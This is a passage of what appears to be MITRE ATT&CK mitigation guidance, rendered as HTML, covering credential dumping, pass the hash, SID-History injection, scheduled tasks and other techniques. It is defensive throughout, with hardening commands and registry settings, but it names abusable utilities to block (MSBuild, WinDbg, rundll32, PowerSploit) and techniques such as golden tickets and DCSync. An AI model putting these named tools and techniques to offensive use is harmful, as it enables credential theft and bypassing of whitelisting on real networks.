<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific C2 protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_application_window_discovery_mitigation_t1010"><a class="anchor" href="#_application_window_discovery_mitigation_t1010"></a><a class="link" href="#_application_window_discovery_mitigation_t1010">Application Window Discovery Mitigation - T1010</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_external_remote_services_mitigation_t1133"><a class="anchor" href="#_external_remote_services_mitigation_t1133"></a><a class="link" href="#_external_remote_services_mitigation_t1133">External Remote Services Mitigation - T1133</a></h3>
<div class="paragraph">
<p>Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems. Deny direct remote access to internal systems through uses of network proxies, gateways, and firewalls as appropriate. Disable or block services such as Windows Remote Management can be used externally. Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary&#8217;s ability to leverage stolen credentials, but be aware of Two-Factor Authentication Interception techniques for some two-factor authentication implementations.</p>
</div>
</div>
<div class="sect2">
<h3 id="_pass_the_hash_mitigation_t1075"><a class="anchor" href="#_pass_the_hash_mitigation_t1075"></a><a class="link" href="#_pass_the_hash_mitigation_t1075">Pass the Hash Mitigation - T1075</a></h3>
<div class="paragraph">
<p>Monitor systems and domain logs for unusual credential logon activity. Prevent access to Valid Accounts. Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group.</p>
</div>
<div class="paragraph">
<p>Enable pass the hash mitigations to apply UAC restrictions to local accounts on network logon. The associated Registry key is located &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy&lt;/code&gt; Through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; SCM: Pass the Hash Mitigations: Apply UAC restrictions to local accounts on network logons. (Citation: GitHub IAD Secure Host Baseline UAC Filtering)</p>
</div>
<div class="paragraph">
<p>Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary&#8217;s ability to perform Lateral Movement between systems. Ensure that built-in and created local administrator accounts have complex, unique passwords. Do not allow a domain user to be in the local administrator group on multiple systems.</p>
</div>
</div>
<div class="sect2">
<h3 id="_account_discovery_mitigation_t1087"><a class="anchor" href="#_account_discovery_mitigation_t1087"></a><a class="link" href="#_account_discovery_mitigation_t1087">Account Discovery Mitigation - T1087</a></h3>
<div class="paragraph">
<p>Prevent administrator accounts from being enumerated when an application is elevating through UAC since it can lead to the disclosure of account names. The Registry key is located &lt;code&gt;HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators&lt;/code&gt;. It can be disabled through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; Windows Components &gt; Credential User Interface: E numerate administrator accounts on elevation. (Citation: UCF STIG Elevation Account Enumeration)</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system and domain accounts, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_trusted_developer_utilities_mitigation_t1127"><a class="anchor" href="#_trusted_developer_utilities_mitigation_t1127"></a><a class="link" href="#_trusted_developer_utilities_mitigation_t1127">Trusted Developer Utilities Mitigation - T1127</a></h3>
<div class="paragraph">
<p>MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, cdb.exe, and tracker.exe may not be necessary within a given environment and should be removed if not used.</p>
</div>
<div class="paragraph">
<p>Use application whitelisting configured to block execution of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, and cdb.exe if they are not required for a given system or network to prevent potential misuse by adversaries. (Citation: Microsoft GitHub Device Guard CI Policies) (Citation: Exploit Monday Mitigate Device Guard Bypases) (Citation: GitHub mattifestation DeviceGuardBypass) (Citation: SubTee MSBuild)</p>
</div>
</div>
<div class="sect2">
<h3 id="_pass_the_ticket_mitigation_t1097"><a class="anchor" href="#_pass_the_ticket_mitigation_t1097"></a><a class="link" href="#_pass_the_ticket_mitigation_t1097">Pass the Ticket Mitigation - T1097</a></h3>
<div class="paragraph">
<p>Monitor domains for unusual credential logons. Limit credential overlap across systems to prevent the damage of credential compromise. Ensure that local administrator accounts have complex, unique passwords. Do not allow a user to be a local administrator for multiple systems. Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts. (Citation: ADSecurity AD Kerberos Attacks)</p>
</div>
<div class="paragraph">
<p>For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it. (Citation: CERT-EU Golden Ticket Protection)</p>
</div>
<div class="paragraph">
<p>Attempt to identify and block unknown or malicious software that could be used to obtain Kerberos tickets and use them to authenticate by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_owner_user_discovery_mitigation_t1033"><a class="anchor" href="#_system_owner_user_discovery_mitigation_t1033"></a><a class="link" href="#_system_owner_user_discovery_mitigation_t1033">System Owner/User Discovery Mitigation - T1033</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_credential_dumping_mitigation_t1003"><a class="anchor" href="#_credential_dumping_mitigation_t1003"></a><a class="link" href="#_credential_dumping_mitigation_t1003">Credential Dumping Mitigation - T1003</a></h3>
<div class="paragraph">
<p>Monitor/harden access to LSASS and SAM table with tools that allow process whitelisting. Limit credential overlap across systems to prevent lateral movement opportunities using Valid Accounts if passwords and hashes are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA. (Citation: Microsoft LSA)</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to dump credentials by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
<div class="paragraph">
<p>With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements. (Citation: TechNet Credential Guard) It also does not protect against all forms of credential dumping. (Citation: GitHub SHB Credential Guard)</p>
</div>
<div class="paragraph">
<p>Manage the access control list for “Replicating Directory Changes” and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL)</p>
</div>
<div class="paragraph">
<p>Consider disabling or restricting NTLM traffic. (Citation: Microsoft Disable NTLM Nov 2012)</p>
</div>
</div>
<div class="sect2">
<h3 id="_regsvr32_mitigation_t1117"><a class="anchor" href="#_regsvr32_mitigation_t1117"></a><a class="link" href="#_regsvr32_mitigation_t1117">Regsvr32 Mitigation - T1117</a></h3>
<div class="paragraph">
<p>Microsoft&#8217;s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting. (Citation: Secure Host Baseline EMET)</p>
</div>
</div>
<div class="sect2">
<h3 id="_process_hollowing_mitigation_t1093"><a class="anchor" href="#_process_hollowing_mitigation_t1093"></a><a class="link" href="#_process_hollowing_mitigation_t1093">Process Hollowing Mitigation - T1093</a></h3>
<div class="paragraph">
<p>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.</p>
</div>
<div class="paragraph">
<p>Although process hollowing may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_lc_main_hijacking_mitigation_t1149"><a class="anchor" href="#_lc_main_hijacking_mitigation_t1149"></a><a class="link" href="#_lc_main_hijacking_mitigation_t1149">LC_MAIN Hijacking Mitigation - T1149</a></h3>
<div class="paragraph">
<p>Enforce valid digital signatures for signed code on all applications and only trust applications with signatures from trusted parties.</p>
</div>
</div>
<div class="sect2">
<h3 id="_sid_history_injection_mitigation_t1178"><a class="anchor" href="#_sid_history_injection_mitigation_t1178"></a><a class="link" href="#_sid_history_injection_mitigation_t1178">SID-History Injection Mitigation - T1178</a></h3>
<div class="paragraph">
<p>Clean up SID-History attributes after legitimate account migration is complete.</p>
</div>
<div class="paragraph">
<p>Apply SID Filtering to domain trusts to exclude SID-History from requests to access domain resources (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /quarantine:yes&lt;/code&gt; (Citation: Microsoft Netdom Trust Sept 2012) on the domain controller). Domain SID Filtering is disabled by default.</p>
</div>
<div class="paragraph">
<p>Apply SID Filtering to forest trusts to exclude SID-History from request to access forest resources (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /EnableSIDHistory:no&lt;/code&gt; (Citation: Microsoft Netdom Trust Sept 2012) on the domain controller). Forest SID Filtering is active by default, but may block child domains from transitively accessesing the forest trust.</p>
</div>
<div class="paragraph">
<p>Ensure SID Filter Quarantining is enabled on trusted external domains (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /quarantine&lt;/code&gt; (Citation: Microsoft Netdom Trust Sept 2012) on the domain controller) to ensure authentication requests only include SIDs from that domain. SID Filter Quarantining is automatically enabled on all created external trusts using Server 2003 or later domain controllers. (Citation: Microsoft Trust Considerations Nov 2014) (Citation: Microsoft SID) Filtering Quarantining Jan 2009</p>
</div>
</div>
<div class="sect2">
<h3 id="_startup_items_mitigation_t1165"><a class="anchor" href="#_startup_items_mitigation_t1165"></a><a class="link" href="#_startup_items_mitigation_t1165">Startup Items Mitigation - T1165</a></h3>
<div class="paragraph">
<p>Since StartupItems are deprecated, preventing all users from writing to the &lt;code&gt;/Library/StartupItems&lt;/code&gt; directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they cant be leveraged for privilege escalation.</p>
</div>
</div>
<div class="sect2">
<h3 id="_execution_through_api_mitigation_t1106"><a class="anchor" href="#_execution_through_api_mitigation_t1106"></a><a class="link" href="#_execution_through_api_mitigation_t1106">Execution through API Mitigation - T1106</a></h3>
<div class="paragraph">
<p>Mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior. Audit and/or block potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_taint_shared_content_mitigation_t1080"><a class="anchor" href="#_taint_shared_content_mitigation_t1080"></a><a class="link" href="#_taint_shared_content_mitigation_t1080">Taint Shared Content Mitigation - T1080</a></h3>
<div class="paragraph">
<p>Protect shared folders by minimizing users who have write access. Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).</p>
</div>
<div class="paragraph">
<p>Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_redundant_access_mitigation_t1108"><a class="anchor" href="#_redundant_access_mitigation_t1108"></a><a class="link" href="#_redundant_access_mitigation_t1108">Redundant Access Mitigation - T1108</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used as a remote access tool, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_domain_fronting_mitigation_t1172"><a class="anchor" href="#_domain_fronting_mitigation_t1172"></a><a class="link" href="#_domain_fronting_mitigation_t1172">Domain Fronting Mitigation - T1172</a></h3>
<div class="paragraph">
<p>If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be Domain Fronting.</p>
</div>
<div class="paragraph">
<p>In order to use domain fronting, attackers will likely need to deploy additional tools to compromised systems. (Citation: FireEye APT29 Domain Fronting With TOR March 2017) (Citation: Mandiant No Easy Breach) It may be possible to detect or prevent the installation of these tools with Host-based solutions.</p>
</div>
</div>
<div class="sect2">
<h3 id="_audio_capture_mitigation_t1123"><a class="anchor" href="#_audio_capture_mitigation_t1123"></a><a class="link" href="#_audio_capture_mitigation_t1123">Audio Capture Mitigation - T1123</a></h3>
<div class="paragraph">
<p>Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to record audio by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_new_service_mitigation_t1050"><a class="anchor" href="#_new_service_mitigation_t1050"></a><a class="link" href="#_new_service_mitigation_t1050">New Service Mitigation - T1050</a></h3>
<div class="paragraph">
<p>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new services.</p>
</div>
<div class="paragraph">
<p>Identify and block unnecessary system utilities or potentially malicious software that may be used to create services by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_scripting_mitigation_t1064"><a class="anchor" href="#_scripting_mitigation_t1064"></a><a class="link" href="#_scripting_mitigation_t1064">Scripting Mitigation - T1064</a></h3>
<div class="paragraph">
<p>Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell.</p>
</div>
</div>
<div class="sect2">
<h3 id="_plist_modification_mitigation_t1150"><a class="anchor" href="#_plist_modification_mitigation_t1150"></a><a class="link" href="#_plist_modification_mitigation_t1150">Plist Modification Mitigation - T1150</a></h3>
<div class="paragraph">
<p>Prevent plist files from being modified by users by making them read-only.</p>
</div>
</div>
<div class="sect2">
<h3 id="_rundll32_mitigation_t1085"><a class="anchor" href="#_rundll32_mitigation_t1085"></a><a class="link" href="#_rundll32_mitigation_t1085">Rundll32 Mitigation - T1085</a></h3>
<div class="paragraph">
<p>Microsoft&#8217;s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting. (Citation: Secure Host Baseline EMET)</p>
</div>
</div>
<div class="sect2">
<h3 id="_multi_hop_proxy_mitigation_t1188"><a class="anchor" href="#_multi_hop_proxy_mitigation_t1188"></a><a class="link" href="#_multi_hop_proxy_mitigation_t1188">Multi-hop Proxy Mitigation - T1188</a></h3>
<div class="paragraph">
<p>Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like Domain Fronting.</p>
</div>
</div>
<div class="sect2">
<h3 id="_fallback_channels_mitigation_t1008"><a class="anchor" href="#_fallback_channels_mitigation_t1008"></a><a class="link" href="#_fallback_channels_mitigation_t1008">Fallback Channels Mitigation - T1008</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_service_discovery_mitigation_t1007"><a class="anchor" href="#_system_service_discovery_mitigation_t1007"></a><a class="link" href="#_system_service_discovery_mitigation_t1007">System Service Discovery Mitigation - T1007</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_indicator_removal_on_host_mitigation_t1070"><a class="anchor" href="#_indicator_removal_on_host_mitigation_t1070"></a><a class="link" href="#_indicator_removal_on_host_mitigation_t1070">Indicator Removal on Host Mitigation - T1070</a></h3>
<div class="paragraph">
<p>Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. Protect generated event files that are stored locally with proper permissions and authentication. Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.</p>
</div>
</div>
<div class="sect2">
<h3 id="_service_registry_permissions_weakness_mitigation_t1058"><a class="anchor" href="#_service_registry_permissions_weakness_mitigation_t1058"></a><a class="link" href="#_service_registry_permissions_weakness_mitigation_t1058">Service Registry Permissions Weakness Mitigation - T1058</a></h3>
<div class="paragraph">
<p>Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_timestomp_mitigation_t1099"><a class="anchor" href="#_timestomp_mitigation_t1099"></a><a class="link" href="#_timestomp_mitigation_t1099">Timestomp Mitigation - T1099</a></h3>
<div class="paragraph">
<p>Mitigation of timestomping specifically is likely difficult. Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to perform timestomping by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_network_configuration_discovery_mitigation_t1016"><a class="anchor" href="#_system_network_configuration_discovery_mitigation_t1016"></a><a class="link" href="#_system_network_configuration_discovery_mitigation_t1016">System Network Configuration Discovery Mitigation - T1016</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about a system&#8217;s network configuration, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_execution_through_module_load_mitigation_t1129"><a class="anchor" href="#_execution_through_module_load_mitigation_t1129"></a><a class="link" href="#_execution_through_module_load_mitigation_t1129">Execution through Module Load Mitigation - T1129</a></h3>
<div class="paragraph">
<p>Directly mitigating module loads and API calls related to module loads will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying and correlated subsequent behavior to determine if it is the result of malicious activity.</p>
</div>
</div>
<div class="sect2">
<h3 id="_shared_webroot_mitigation_t1051"><a class="anchor" href="#_shared_webroot_mitigation_t1051"></a><a class="link" href="#_shared_webroot_mitigation_t1051">Shared Webroot Mitigation - T1051</a></h3>
<div class="paragraph">
<p>Networks that allow for open development and testing of Web content and allow users to set up their own Web servers on the enterprise network may be particularly vulnerable if the systems and Web servers are not properly secured to limit privileged account use, unauthenticated network share access, and network/system isolation.</p>
</div>
<div class="paragraph">
<p>Ensure proper permissions on directories that are accessible through a Web server. Disallow remote access to the webroot or other directories used to serve Web content. Disable execution on directories within the webroot. Ensure that permissions of the Web server process are only what is required by not using built-in accounts; instead, create specific accounts to limit unnecessary access or permissions overlap across multiple systems.</p>
</div>
</div>
<div class="sect2">
<h3 id="_scheduled_task_mitigation_t1053"><a class="anchor" href="#_scheduled_task_mitigation_t1053"></a><a class="link" href="#_scheduled_task_mitigation_t1053">Scheduled Task Mitigation - T1053</a></h3>
<div class="paragraph">
<p>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)</p>
</div>
<div class="paragraph">
<p>Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl&lt;/code&gt;. The setting can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task)</p>
</div>
<div class="paragraph">
<p>Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)</p>
</div>
<div class="paragraph">
<p>Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_binary_padding_mitigation_t1009"><a class="anchor" href="#_binary_padding_mitigation_t1009"></a><a class="link" href="#_binary_padding_mitigation_t1009">Binary Padding Mitigation - T1009</a></h3>
<div class="paragraph">
<p>Identify potentially malicious software that may be executed from a padded or otherwise obfuscated binary, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_network_sniffing_mitigation_t1040"><a class="anchor" href="#_network_sniffing_mitigation_t1040"></a><a class="link" href="#_network_sniffing_mitigation_t1040">Network Sniffing Mitigation - T1040</a></h3>
<div class="paragraph">
<p>Ensure that all wireless traffic is encrypted appropriately. Use Kerberos, SSL, and multifactor authentication wherever possible. Monitor switches and network for span port usage, ARP/DNS poisoning, and router reconfiguration.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to sniff or analyze network traffic by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_encrypted_mitigation_t1022"><a class="anchor" href="#_data_encrypted_mitigation_t1022"></a><a class="link" href="#_data_encrypted_mitigation_t1022">Data Encrypted Mitigation - T1022</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to encrypt files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_standard_cryptographic_protocol_mitigation_t1032"><a class="anchor" href="#_standard_cryptographic_protocol_mitigation_t1032"></a><a class="link" href="#_standard_cryptographic_protocol_mitigation_t1032">Standard Cryptographic Protocol Mitigation - T1032</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_multilayer_encryption_mitigation_t1079"><a class="anchor" href="#_multilayer_encryption_mitigation_t1079"></a><a class="link" href="#_multilayer_encryption_mitigation_t1079">Multilayer Encryption Mitigation - T1079</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_masquerading_mitigation_t1036"><a class="anchor" href="#_masquerading_mitigation_t1036"></a><a class="link" href="#_masquerading_mitigation_t1036">Masquerading Mitigation - T1036</a></h3>
<div class="paragraph">
<p>When creating security rules, avoid exclusions based on file name or file path. Require signed binaries. Use file system access controls to protect folders such as C:\Windows\System32. Use tools that restrict program execution via whitelisting by attributes other than file name.</p>
</div>
<div class="paragraph">
<p>Identify potentially malicious software that may look like a legitimate program based on name and location, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_file_system_logical_offsets_mitigation_t1006"><a class="anchor" href="#_file_system_logical_offsets_mitigation_t1006"></a><a class="link" href="#_file_system_logical_offsets_mitigation_t1006">File System Logical Offsets Mitigation - T1006</a></h3>
<div class="paragraph">
<p>Identify potentially malicious software that may be used to access logical drives in this manner, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_remote_services_mitigation_t1021"><a class="anchor" href="#_remote_services_mitigation_t1021"></a><a class="link" href="#_remote_services_mitigation_t1021">Remote Services Mitigation - T1021</a></h3>
<div class="paragraph">
<p>Limit the number of accounts that may use remote services. Use multifactor authentication where possible. Limit the permissions for accounts that are at higher risk of compromise; for example, configure SSH so users can only run specific programs. Prevent Credential Access techniques that may allow an adversary to acquire Valid Accounts that can be used by existing services.</p>
</div>
</div>
<div class="sect2">
<h3 id="_file_deletion_mitigation_t1107"><a class="anchor" href="#_file_deletion_mitigation_t1107"></a><a class="link" href="#_file_deletion_mitigation_t1107">File Deletion Mitigation - T1107</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to delete files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_compressed_mitigation_t1002"><a class="anchor" href="#_data_compressed_mitigation_t1002"></a><a class="link" href="#_data_compressed_mitigation_t1002">Data Compressed Mitigation - T1002</a></h3>
<div class="paragraph">
